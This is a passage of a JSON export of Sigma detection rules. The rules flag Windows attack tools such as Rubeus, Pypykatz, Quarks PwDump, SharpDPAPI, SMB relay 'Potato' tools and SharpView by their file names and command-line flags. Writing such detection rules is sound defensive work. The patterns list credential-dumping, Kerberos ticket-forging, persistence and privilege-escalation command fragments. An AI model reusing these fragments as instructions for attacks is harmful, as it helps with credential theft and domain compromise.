    "content": "title: HackTool - Default PowerSploit/Empire Scheduled Task Creation\nid: 56c217c3-2de2-479b-990f-5c109ba8458f\nstatus: test\ndescription: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.\nreferences:\n    - https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py\nauthor: Markus Neis, @Karneades\ndate: 2018-03-06\nmodified: 2023-03-03\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.s0111\n    - attack.g0022\n    - attack.g0060\n    - car.2013-08-001\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/Create'\n            - 'powershell.exe -NonI'\n            - '/TN Updater /TR'\n        CommandLine|contains:\n            - '/SC ONLOGON'\n            - '/SC DAILY /ST'\n            - '/SC ONIDLE'\n            - '/SC HOURLY'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_powertool.yml",
    "content": "title: HackTool - PowerTool Execution\nid: a34f79a3-8e5f-4cc3-b765-de00695452c2\nstatus: test\ndescription: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files\nreferences:\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\n    - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\n    - https://twitter.com/gbti_sa/status/1249653895900602375?lang=en\n    - https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-29\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\PowerTool.exe'\n              - '\\PowerTool64.exe'\n        - OriginalFileName: 'PowerTool.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml",
    "content": "title: HackTool - PurpleSharp Execution\nid: ff23ffbc-3378-435e-992f-0624dcf93ab4\nstatus: test\ndescription: Detects the execution of the PurpleSharp adversary simulation tool\nreferences:\n    - https://github.com/mvelazc0/PurpleSharp\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-18\nmodified: 2023-02-05\ntags:\n    - attack.t1587\n    - attack.resource-development\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\purplesharp'\n        - OriginalFileName: 'PurpleSharp.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'xyz123456.exe'\n            - 'PurpleSharp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml",
    "content": "title: HackTool - Pypykatz Credentials Dumping Activity\nid: a29808fd-ef50-49ff-9c7a-59a9b040b404\nstatus: test\ndescription: Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored\nreferences:\n    - https://github.com/skelsec/pypykatz\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz\nauthor: frack113\ndate: 2022-01-05\nmodified: 2023-02-05\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - \\pypykatz.exe\n            - \\python.exe\n        CommandLine|contains|all:\n            - 'live'\n            - 'registry'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml",
    "content": "title: HackTool - Quarks PwDump Execution\nid: 0685b176-c816-4837-8e7b-1216f346636b\nstatus: test\ndescription: Detects usage of the Quarks PwDump tool via commandline arguments\nreferences:\n    - https://github.com/quarkslab/quarkspwdump\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-05\nmodified: 2023-02-05\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\QuarksPwDump.exe'\n    selection_cli:\n        CommandLine:\n            - ' -dhl'\n            - ' --dump-hash-local'\n            - ' -dhdc'\n            - ' --dump-hash-domain-cached'\n            - ' --dump-bitlocker'\n            - ' -dhd '\n            - ' --dump-hash-domain '\n            - '--ntds-file'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml",
    "content": "title: HackTool - RedMimicry Winnti Playbook Execution\nid: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b\nstatus: test\ndescription: Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility\nreferences:\n    - https://redmimicry.com/posts/redmimicry-winnti/\nauthor: Alexander Rausch\ndate: 2020-06-24\nmodified: 2023-03-01\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1106\n    - attack.t1059.003\n    - attack.t1218.011\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\rundll32.exe'\n            - '\\cmd.exe'\n        CommandLine|contains:\n            - 'gthread-3.6.dll'\n            - '\\Windows\\Temp\\tmp.bat'\n            - 'sigcmm-2.4.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml",
    "content": "title: Potential SMB Relay Attack Tool Execution\nid: 5589ab4f-a767-433c-961d-c91f3f704db1\nstatus: test\ndescription: Detects different hacktools used for relay attacks on Windows for privilege escalation\nreferences:\n    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\n    - https://pentestlab.blog/2017/04/13/hot-potato/\n    - https://github.com/ohpe/juicy-potato\n    - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes\n    - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire\n    - https://www.localpotato.com/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-24\nmodified: 2023-02-14\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        Image|contains:\n            - 'PetitPotam'\n            - 'RottenPotato'\n            - 'HotPotato'\n            - 'JuicyPotato'\n            - '\\just_dce_'\n            - 'Juicy Potato'\n            - '\\temp\\rot.exe'\n            - '\\Potato.exe'\n            - '\\SpoolSample.exe'\n            - '\\Responder.exe'\n            - '\\smbrelayx'\n            - '\\ntlmrelayx'\n            - '\\LocalPotato'\n    selection_script:\n        CommandLine|contains:\n            - 'Invoke-Tater'\n            - ' smbrelay'\n            - ' ntlmrelay'\n            - 'cme smb '\n            - ' /ntlm:NTLMhash '\n            - 'Invoke-PetitPotam'\n            - '.exe -t * -p '  # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG\n    selection_juicypotato_enum:  # appears when JuicyPotatoNG is used with -b\n        CommandLine|contains: '.exe -c \"{'\n        CommandLine|endswith: '}\" -z'\n    filter_hotpotatoes:  # known goodware https://hotpot.uvic.ca/\n        Image|contains:\n            - 'HotPotatoes6'\n            - 'HotPotatoes7'\n            - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate files with these rare hacktool names\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml",
    "content": "title: HackTool - Rubeus Execution\nid: 7ec2c172-dceb-4c10-92c9-87c1881b7e18\nrelated:\n    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18\n      type: similar\nstatus: stable\ndescription: Detects the execution of the hacktool Rubeus via PE information or command line parameters\nreferences:\n    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus\n    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\n    - https://github.com/GhostPack/Rubeus\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-12-19\nmodified: 2023-04-20\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1558.003\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Rubeus.exe'\n        - OriginalFileName: 'Rubeus.exe'\n        - Description: 'Rubeus'\n        - CommandLine|contains:\n              - 'asreproast '\n              - 'dump /service:krbtgt '\n              - 'dump /luid:0x'\n              - 'kerberoast '\n              - 'createnetonly /program:'\n              - 'ptt /ticket:'\n              - '/impersonateuser:'\n              - 'renew /ticket:'\n              - 'asktgt /user:'\n              - 'harvest /interval:'\n              - 's4u /user:'\n              - 's4u /ticket:'\n              - 'hash /password:'\n              - 'golden /aes256:'\n              - 'silver /user:'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml",
    "content": "title: HackTool - SafetyKatz Execution\nid: b1876533-4ed5-4a83-90f3-b8645840a413\nstatus: test\ndescription: Detects the execution of the hacktool SafetyKatz via PE information and default Image name\nreferences:\n    - https://github.com/GhostPack/SafetyKatz\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-20\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SafetyKatz.exe'\n        - OriginalFileName: 'SafetyKatz.exe'\n        - Description: 'SafetyKatz'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml",
    "content": "title: HackTool - SecurityXploded Execution\nid: 7679d464-4f74-45e2-9e01-ac66c5eb041a\nstatus: stable\ndescription: Detects the execution of SecurityXploded Tools\nreferences:\n    - https://securityxploded.com/\n    - https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-12-19\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1555\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Company: SecurityXploded\n        - Image|endswith: 'PasswordDump.exe'\n        - OriginalFileName|endswith: 'PasswordDump.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml",
    "content": "title: HackTool - PPID Spoofing SelectMyParent Tool Execution\nid: 52ff7941-8211-46f9-84f8-9903efb7077d\nstatus: test\ndescription: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent\nreferences:\n    - https://pentestlab.blog/2020/02/24/parent-pid-spoofing/\n    - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks\n    - https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing\n    - https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-23\nmodified: 2024-11-23\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SelectMyParent.exe'\n        - CommandLine|contains:\n              - 'PPID-spoof'\n              - 'ppid_spoof'\n              - 'spoof-ppid'\n              - 'spoof_ppid'\n              - 'ppidspoof'\n              - 'spoofppid'\n              - 'spoofedppid'\n              - ' -spawnto '\n        - OriginalFileName|contains:\n              - 'PPID-spoof'\n              - 'ppid_spoof'\n              - 'spoof-ppid'\n              - 'spoof_ppid'\n              - 'ppidspoof'\n              - 'spoofppid'\n              - 'spoofedppid'\n        - Description: 'SelectMyParent'\n        - Hashes|contains:\n              - 'IMPHASH=04D974875BD225F00902B4CAD9AF3FBC'\n              - 'IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E'\n              - 'IMPHASH=89059503D7FBF470E68F7E63313DA3AD'\n              - 'IMPHASH=CA28337632625C8281AB8A130B3D6BAD'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml",
    "content": "title: HackTool - SharpChisel Execution\nid: cf93e05e-d798-4d9e-b522-b0248dc61eaf\nrelated:\n    - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5\n      type: similar\nstatus: test\ndescription: Detects usage of the Sharp Chisel via the commandline arguments\nreferences:\n    - https://github.com/shantanu561993/SharpChisel\n    - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-05\nmodified: 2023-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SharpChisel.exe'\n        - Product: 'SharpChisel'\n    # See rule 8b0e12da-d3c3-49db-bb4f-256703f380e5 for Chisel.exe coverage\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_dpapi_execution.yml",
    "content": "title: HackTool - SharpDPAPI Execution\nid: c7d33b50-f690-4b51-8cfb-0fb912a31e57\nstatus: test\ndescription: |\n    Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.\n    SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.\nreferences:\n    - https://github.com/GhostPack/SharpDPAPI\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-26\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.001\n    - attack.t1134.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpDPAPI.exe'\n        - OriginalFileName: 'SharpDPAPI.exe'\n    selection_other_cli:\n        CommandLine|contains:\n            - ' backupkey '\n            - ' blob '\n            - ' certificates '\n            - ' credentials '\n            - ' keepass '\n            - ' masterkeys '\n            - ' rdg '\n            - ' vaults '\n    selection_other_options_guid:\n        CommandLine|contains|all:\n            - ' {'\n            - '}:'\n    selection_other_options_flags:\n        CommandLine|contains:\n            - ' /file:'\n            - ' /machine'\n            - ' /mkfile:'\n            - ' /password:'\n            - ' /pvk:'\n            - ' /server:'\n            - ' /target:'\n            - ' /unprotect'\n    condition: selection_img or (selection_other_cli and 1 of selection_other_options_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml",
    "content": "title: HackTool - SharpImpersonation Execution\nid: f89b08d0-77ad-4728-817b-9b16c5a69c7a\nrelated:\n    - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94\n      type: similar\nstatus: test\ndescription: Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively\nreferences:\n    - https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/\n    - https://github.com/S3cur3Th1sSh1t/SharpImpersonation\nauthor: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-27\nmodified: 2023-02-13\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.001\n    - attack.t1134.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpImpersonation.exe'\n        - OriginalFileName: 'SharpImpersonation.exe'\n    selection_cli:\n        - CommandLine|contains|all:\n              - ' user:'\n              - ' binary:'\n        - CommandLine|contains|all:\n              - ' user:'\n              - ' shellcode:'\n        - CommandLine|contains:\n              - ' technique:CreateProcessAsUserW'\n              - ' technique:ImpersonateLoggedOnuser'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml",
    "content": "title: HackTool - SharpLDAPmonitor Execution\nid: 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541\nstatus: test\ndescription: Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and changes to LDAP objects.\nreferences:\n    - https://github.com/p0dalirius/LDAPmonitor\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-30\nmodified: 2023-02-14\ntags:\n    - attack.discovery\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpLDAPmonitor.exe'\n        - OriginalFileName: 'SharpLDAPmonitor.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/user:'\n            - '/pass:'\n            - '/dcip:'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml",
    "content": "title: HackTool - SharPersist Execution\nid: 26488ad0-f9fd-4536-876f-52fea846a2e4\nstatus: test\ndescription: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms\nreferences:\n    - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit\n    - https://github.com/mandiant/SharPersist\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-15\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharPersist.exe'\n        - Product: 'SharPersist'\n    selection_cli_1:\n        CommandLine|contains:\n            - ' -t schtask -c '\n            - ' -t startupfolder -c '\n    selection_cli_2:\n        CommandLine|contains|all:\n            - ' -t reg -c '\n            - ' -m add'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - ' -t service -c '\n            - ' -m add'\n    selection_cli_4:\n        CommandLine|contains|all:\n            - ' -t schtask -c '\n            - ' -m add'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml",
    "content": "title: HackTool - SharpEvtMute Execution\nid: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c\nrelated:\n    - id: 49329257-089d-46e6-af37-4afce4290685 # DLL load\n      type: similar\nstatus: test\ndescription: Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs\nreferences:\n    - https://github.com/bats3c/EvtMute\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: '\\SharpEvtMute.exe'\n        - Description: 'SharpEvtMute'\n        - CommandLine|contains:\n              - '--Filter \"rule '\n              - '--Encoded --Filter \\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml",
    "content": "title: HackTool - SharpLdapWhoami Execution\nid: d9367cbb-c2e0-47ce-bdc0-128cb6da898d\nstatus: test\ndescription: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller\nreferences:\n    - https://github.com/bugch3ck/SharpLdapWhoami\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-29\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        Image|endswith: '\\SharpLdapWhoami.exe'\n    selection_pe: # in case the file has been renamed after compilation\n        - OriginalFileName|contains: 'SharpLdapWhoami'\n        - Product: 'SharpLdapWhoami'\n    selection_flags1:\n        CommandLine|endswith:\n            - ' /method:ntlm'\n            - ' /method:kerb'\n            - ' /method:nego'\n            - ' /m:nego'\n            - ' /m:ntlm'\n            - ' /m:kerb'\n    condition: 1 of selection*\nfalsepositives:\n    - Programs that use the same command line flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml",
    "content": "title: HackTool - SharpMove Tool Execution\nid: 055fb54c-a8f4-4aee-bd44-f74cf30a0d9d\nstatus: test\ndescription: |\n    Detects the execution of SharpMove, a .NET utility that performs multiple tasks such as \"Task Creation\", \"SCM\" queries and VBScript execution using WMI, based on its PE metadata and command line options.\nreferences:\n    - https://github.com/0xthirteen/SharpMove/\n    - https://pentestlab.blog/tag/sharpmove/\nauthor: Luca Di Bartolomeo (CrimpSec)\ndate: 2024-01-29\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SharpMove.exe'\n        - OriginalFileName: SharpMove.exe\n    selection_cli_computer:\n        # In its current implementation the \"computername\" flag is required in all actions\n        CommandLine|contains: 'computername='\n    selection_cli_actions:\n        CommandLine|contains:\n            - 'action=create'\n            - 'action=dcom'\n            - 'action=executevbs'\n            - 'action=hijackdcom'\n            - 'action=modschtask'\n            - 'action=modsvc'\n            - 'action=query'\n            - 'action=scm'\n            - 'action=startservice'\n            - 'action=taskscheduler'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpsuccessor_execution.yml",
    "content": "title: HKTL - SharpSuccessor Privilege Escalation Tool Execution\nid: 38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8\nstatus: experimental\ndescription: |\n    Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.\n    Successful usage of this tool can let attackers gain domain admin privileges by exploiting the BadSuccessor vulnerability.\nreferences:\n    - https://github.com/logangoins/SharpSuccessor\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-06\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SharpSuccessor.exe'\n        - OriginalFileName: 'SharpSuccessor.exe'\n        - CommandLine|contains: 'SharpSuccessor'\n        - CommandLine|contains|all:\n              - ' add '\n              - ' /impersonate'\n              - ' /path'\n              - ' /account'\n              - ' /name'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml",
    "content": "title: HackTool - SharpUp PrivEsc Tool Execution\nid: c484e533-ee16-4a93-b6ac-f0ea4868b2f1\nstatus: test\ndescription: Detects the use of SharpUp, a tool for local privilege escalation\nreferences:\n    - https://github.com/GhostPack/SharpUp\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-20\nmodified: 2023-02-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.execution\n    - attack.t1615\n    - attack.t1569.002\n    - attack.t1574.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SharpUp.exe'\n        - Description: 'SharpUp'\n        - CommandLine|contains:\n              - 'HijackablePaths'\n              - 'UnquotedServicePath'\n              - 'ProcessDLLHijack'\n              - 'ModifiableServiceBinaries'\n              - 'ModifiableScheduledTask'\n              - 'DomainGPPPassword'\n              - 'CachedGPPPassword'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml",
    "content": "title: HackTool - SharpView Execution\nid: b2317cfa-4a47-4ead-b3ff-297438c0bc2d\nrelated:\n    - id: dcd74b95-3f36-4ed9-9598-0490951643aa\n      type: similar\nstatus: test\ndescription: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems\nreferences:\n    - https://github.com/tevora-threat/SharpView/\n    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-02-14\ntags:\n    - attack.discovery\n    - attack.t1049\n    - attack.t1069.002\n    - attack.t1482\n    - attack.t1135\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'SharpView.exe'\n        - Image|endswith: '\\SharpView.exe'\n        - CommandLine|contains:\n              # - 'Add-DomainGroupMember'\n              # - 'Add-DomainObjectAcl'\n              # - 'Add-ObjectAcl'\n              - 'Add-RemoteConnection'\n              - 'Convert-ADName'\n              - 'ConvertFrom-SID'\n              - 'ConvertFrom-UACValue'\n              - 'Convert-SidToName'\n              # - 'ConvertTo-SID'\n              - 'Export-PowerViewCSV'\n              # - 'Find-DomainLocalGroupMember'\n              - 'Find-DomainObjectPropertyOutlier'\n              - 'Find-DomainProcess'\n              - 'Find-DomainShare'\n              - 'Find-DomainUserEvent'\n              - 'Find-DomainUserLocation'\n              - 'Find-ForeignGroup'\n              - 'Find-ForeignUser'\n              - 'Find-GPOComputerAdmin'\n              - 'Find-GPOLocation'\n              - 'Find-Interesting' # 'Find-InterestingDomainAcl', 'Find-InterestingDomainShareFile', 'Find-InterestingFile'\n              - 'Find-LocalAdminAccess'\n              - 'Find-ManagedSecurityGroups'\n              # - 'Get-ADObject'\n              - 'Get-CachedRDPConnection'\n              - 'Get-DFSshare'\n              # - 'Get-DNSRecord'\n              # - 'Get-DNSZone'\n              # - 'Get-Domain'\n              - 'Get-DomainComputer'\n              - 'Get-DomainController'\n              - 'Get-DomainDFSShare'\n              - 'Get-DomainDNSRecord'\n              # - 'Get-DomainDNSZone'\n              - 'Get-DomainFileServer'\n              - 'Get-DomainForeign' # 'Get-DomainForeignGroupMember', 'Get-DomainForeignUser'\n              - 'Get-DomainGPO' # 'Get-DomainGPOComputerLocalGroupMapping', 'Get-DomainGPOLocalGroup', 'Get-DomainGPOUserLocalGroupMapping'\n              - 'Get-DomainGroup' # 'Get-DomainGroupMember'\n              - 'Get-DomainGUIDMap'\n              - 'Get-DomainManagedSecurityGroup'\n              - 'Get-DomainObject' # 'Get-DomainObjectAcl'\n              - 'Get-DomainOU'\n              - 'Get-DomainPolicy' # 'Get-DomainPolicyData'\n              - 'Get-DomainSID'\n              - 'Get-DomainSite'\n              - 'Get-DomainSPNTicket'\n              - 'Get-DomainSubnet'\n              - 'Get-DomainTrust' # 'Get-DomainTrustMapping'\n              # - 'Get-DomainUser'\n              - 'Get-DomainUserEvent'\n              # - 'Get-Forest'\n              - 'Get-ForestDomain'\n              - 'Get-ForestGlobalCatalog'\n              - 'Get-ForestTrust'\n              - 'Get-GptTmpl'\n              - 'Get-GroupsXML'\n              # - 'Get-GUIDMap'\n              # - 'Get-IniContent'\n              # - 'Get-IPAddress'\n              - 'Get-LastLoggedOn'\n              - 'Get-LoggedOnLocal'\n              - 'Get-NetComputer' # 'Get-NetComputerSiteName'\n              - 'Get-NetDomain' # 'Get-NetDomainController', 'Get-NetDomainTrust'\n              - 'Get-NetFileServer'\n              - 'Get-NetForest' # 'Get-NetForestCatalog', 'Get-NetForestDomain', 'Get-NetForestTrust'\n              - 'Get-NetGPO' # 'Get-NetGPOGroup'\n              # - 'Get-NetGroup'\n              - 'Get-NetGroupMember'\n              - 'Get-NetLocalGroup' # 'Get-NetLocalGroupMember'\n              - 'Get-NetLoggedon'\n              - 'Get-NetOU'\n              - 'Get-NetProcess'\n              - 'Get-NetRDPSession'\n              - 'Get-NetSession'\n              - 'Get-NetShare'\n              - 'Get-NetSite'\n              - 'Get-NetSubnet'\n              - 'Get-NetUser'\n              # - 'Get-ObjectAcl'\n              - 'Get-PathAcl'\n              - 'Get-PrincipalContext'\n              # - 'Get-Proxy'\n              - 'Get-RegistryMountedDrive'\n              - 'Get-RegLoggedOn'\n              # - 'Get-SiteName'\n              # - 'Get-UserEvent'\n              # - 'Get-WMIProcess'\n              - 'Get-WMIRegCachedRDPConnection'\n              - 'Get-WMIRegLastLoggedOn'\n              - 'Get-WMIRegMountedDrive'\n              - 'Get-WMIRegProxy'\n              - 'Invoke-ACLScanner'\n              - 'Invoke-CheckLocalAdminAccess'\n              - 'Invoke-Kerberoast'\n              